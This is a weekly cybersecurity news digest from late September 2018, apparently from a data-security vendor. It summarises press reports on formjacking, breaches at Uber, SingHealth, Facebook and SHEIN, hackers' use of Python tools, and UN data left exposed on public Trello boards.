Week of September 28, 2018


Week of September 28, 2018

Symantec Sees Major Rise In “Formjacking” Attacks*:

     The amount of formjacking cyber attacks has risen 'dramatically' in the past month or two.

     Following large, eyebrow-raising cyber attacks on Ticketmaster, British Airways, Feedify and Newegg, all by a group called Magecart, Symantec analysed the threat landscape and unveiled that all of these attacks (and many more) were done using what's known as the formjacking technique.

     Formjacking is a technique in which a malicious actor or group inject Java Code into the website's forms.

     Most often, those are check-out or payment forms on e-commerce sites.

     Then, when the unsuspecting victims submits their data (for example, credit card info and email address) to purchase something, this information is transferred to the attacker's servers.

     Symantec claims that it has managed to block 248,000 attempts since August 13 this year. More than a third of those, 36 per cent, occurred from September 13 to September 20.

     There was a 117% increase in the instances of formjacking blocked by Symantec when compared with the same week as that in August.

*Source: IT Pro Portal, September 26, 2018


Uber To Pay $148 Million In Settlement Over 2016 Data Breach*:

     Uber Technologies will pay $148 million to settle claims related to a large-scale data breach that exposed the personal information of more than 25 million of its U.S. users.

     The settlement, spanning all 50 states and the District of Columbia, is the biggest data-breach payout in history, and marks the most sweeping rebuke by regulators against the San Francisco-based company, which earned a reputation for skirting rules in its push to dominate the ride-hailing market. 

     The states’ agreement stemmed from data compromised in 2016 by hackers, who obtained 607,000 U.S. driver’s license numbers as well as tens of millions of consumer email addresses and phone numbers, a leak that Uber failed to disclose for more than a year after discovering the attack.

     The penalty comes at a pivotal time for Uber Chief Executive Officer Dara Khosrowshahi, who is laying the groundwork for a 2019 initial public offering while working to distance the brand from the controversial growth-at-all-costs approach established under his predecessor, co-founder Travis Kalanick.

     Bloomberg News reported last November that Kalanick learned of the 2016 breach just a month after hackers stole the personal data on 57 million of Uber’s customers around the globe, including 25.6 million riders and drivers in the U.S.

     But the company concealed the breach from authorities and instead paid the hackers $100,000 to delete the stolen data and keep the incident quiet.

     After the episode came to light, Uber ousted its chief security officer and disclosed the breach to the Federal Trade Commission, which had already reprimanded the company for a similar data breach from 2014.

     The nine-figure settlement will be distributed to the states, rather than directly to those affected in the breach.

     As part of the agreement, Uber also promised to improve its security policies and hire an outside party to monitor its data-privacy efforts and regularly report on necessary improvements.

*Source: Bloomberg, September 26, 2018


Six Day Delay in IHiS Staff Learning Data was Stolen*:

     On July 4, staff of SingHealth's IT vendor discovered and halted a cyber-attack on the public healthcare group.

     But it took another six days for them to confirm that personal data and prescription records were stolen.

     The reason for the delay was a mistaken statement made by an employee of IHiS stating that no data was stolen.

     It was not until his superior ran some tests at a July 10 meeting that IHiS found that hackers had stolen the data of 1.5 million people and prescription records of 160,000 people, including Prime Minister Lee Hsien Loong and several ministers.

     These details emerged during the testimony of Mr Henry Arianto, IHiS deputy director of product management and delivery in the clinical care department, before a four-member Committee of Inquiry (COI) yesterday.

     Mr Arianto said one of his employees told him on July 9 that the query made by the hackers to SingHealth's database on July 4 - which IHiS discovered and stopped - did not return any results.

     Mr Arianto shared this information at a July 9 meeting with several senior IHiS staff.

     During another meeting on July 10, Mr Arianto decided to "double-check" by running one of these queries. That was when he realised his staff member had been wrong.

     Later that day, the Cyber Security Agency of Singapore was informed of the attack, as were the Health Ministry and SingHealth. Singaporeans were told on July 20.

*Source: The Straits Times, September 27, 2018                        


Facebook Security Breach: Up to 50 Million Accounts Hacked*:

     Facebook says almost 50 million of its users were left exposed by a security flaw.

     The company said attackers were able to exploit a vulnerability in a feature known as “View As” to gain control of people's accounts.

     The breach was discovered on Tuesday, Facebook said, and it has informed police.

     Users that had potentially been affected were prompted to re-log-in on Friday.

     The flaw has been fixed, wrote the firm’s vice-president of product management, Guy Rosen, adding all affected accounts had been reset, as well as another 40 million "as a precautionary step".

     The company has confirmed to reporters that the breach would allow hackers to log in to other accounts that use Facebook's system, of which there are many.

     The company said the users prompted to log-in again did not have to change their passwords.

     The company has confirmed that Facebook founder Mark Zuckerberg and its chief operating officer Sheryl Sandberg were among the 50 million accounts affected.

     The breach comes at a time when the firm is struggling to convince lawmakers in the US and beyond, that it is capable of protecting user data.

     Facebook founder Mark Zuckerberg said on a conference call on Friday that the firm took security seriously, in the face of what he said were constant attacks by bad actors.

     But Jeff Pollard, vice-president and principal analyst at Forrester, said the fact Facebook held so much data meant it should be prepared for such attacks.

     When asked by the BBC, Facebook was unable to say if the investigation would look into why the bugs were missed, or if anyone at the company would be held accountable for the breach.

*Source: BBC, September 29, 2018


Report Finds Python is a Hit With Hackers*:

     After breaking into the top three most popular programming languages for the first time this month, behind C and Java, Python has also won the hearts of hackers and web nasties, according to attack statistics published this week by web security biz Imperva.

     The company says more than a third of daily attacks against sites the company protects come from a malicious or legitimate tool coded in Python.

     Imperva says that around 77 percent of all the sites the company protects, have been attacked by at least one Python-based tool.

     Furthermore, when the company looked at the list of tools that hackers used for their attacks, more than a quarter were coded in Python, by far the attackers' favourite tool.

     Advantages to Python include an easy to pick up syntax, a breadth of online tutorials, and an extensive collection of libraries and other ready-made tools available in places like PyPI and GitHub.

     In fact, many of the Python tools attackers use have often been created for use inside legitimate apps, or by security researchers themselves, for use in testing their own systems against various vulnerabilities.

     But once these testing tools make it on GitHub, they also enter the public domain, from where hackers deploy them in other ways than the ones for which they were initially created.

     Based on Imperva's data, the most abused legitimate Python tools are the "requests" and "urllib" libraries, two of the cornerstones of almost any Python web app.

     As for what hackers do with these things, Imperva's crew says they're attempting to exploit vulnerabilities like CVE-2017-9841 (PHPUnit), CVE-2015-8562 (Joomla), or CVE-2018-1000207 (ModX PHP CMS).

     The moral of this report is that if you have a web app, web server, or website exposed online, it's quite likely that some script kiddie is using a Python tool downloaded from GitHub to break into your server. Which, in hindsight, is no surprise, since Python is just as versatile as Java, but much easier to learn, good and bad guys alike.

*Source: ZDNet, September 28, 2018


UN Exposes Sensitive Data on Public Trello Boards*:

     The United Nations accidentally exposed passwords and internal information to the public-facing internet by misconfiguring Trello boards and other web applications.

     Security researcher Kushagra Pathak discovered the data leak by doing Google searches, which turned up on public Trello boards.

     The information included credentials for a U.N. file server, an internal conferencing system and an internal web development platform.

     Trello, a project management web app, sets newly created boards to private by default, so any boards set to public were configured that way by the owner of the board.

     After Pathak found one public Trello board in use by the U.N., it was easy to find others by looking the board's users and discovering what other boards they were active on.

     On other public Trello boards, he found links to the issue tracking app Jira, where there was more sensitive information, and to Google Docs and Google Drive instances with documents that contained passwords.

     Pathak reported his findings to the U.N.'s security team on Aug. 20.

     On Twitter, he criticized the U.N.'s response to his report; the organization didn't acknowledge it until Sept. 4, and no action was taken until Sept. 12, when a reporter from The Intercept reached out to the U.N. for comment.

     While Pathak waited for the U.N. to address the report, he found and reported even more public Trello boards used by the organization; he found a total of 60 Trello boards, and several Google Docs and Google Drives, as well as sensitive information on the U.N.'s Jira account.

     The U.N. began taking down the exposed information on Sept. 13, and most of it appears to be gone now.

*Source: Search Security, September 28, 2018


6.42 Million Shoppers Hit by Online Fashion Shopping Giant’s Massive Data Breach*:

     Women's online fashion store SHEIN has announced recently that its servers were recently breached with a sophisticated criminal cyberattack that leaked the confidential information of around 6.42 million customers.

     The company confirmed the hackers managed to snag personal information including email addresses and the encrypted passwords of customers who visited its website between June 2018 and early August 2018.

     However, SHEIN claims that they haven't seen evidence that credit card information was taken from their systems during the breach since it doesn't store that type of data on its servers.

     Immediately upon becoming aware of the breach, SHEIN revealed that it hired a leading international forensic cybersecurity firm and an international law firm to conduct a thorough investigation.

     SHEIN also admitted in its advisory that it became aware of the breach on Aug. 22, but didn’t inform its customers for almost a month.

     According to SHEIN's security advisory, the attackers managed to breach its security protections and plant malware on its servers.

     The company did not specify the type of malware that was involved in the cyberattack but it wrote that the affected SHEIN servers have been scanned and the malware has been removed.

     The server backdoors and entry points used by the hackers have also been closed and removed.

     The investigators and SHEIN's IT department will continue to closely monitor their network and servers to prevent similar breaches in the future.

     SHEIN is now in the process of notifying affected customers and the proper authorities about the cyberattack.

     Customer notices are now being sent via email that provide instructions on how to reset account passwords via SHEIN's website.

     SHEIN is also offering a year's worth of identity theft monitoring services to affected customers.

*Source: Komando, September 28, 2018


Get in Touch With Us!

Are you interested in receiving more information about our products? Do you have questions about sensitive data security? Would you like a demo? Complete the details below and one of our specialists will get in touch with you.

We love to help our customers solve their data security problems. Please tell us about what you are trying to accomplish, details about your environment, and any other information that will help us understand your needs better.

scroll top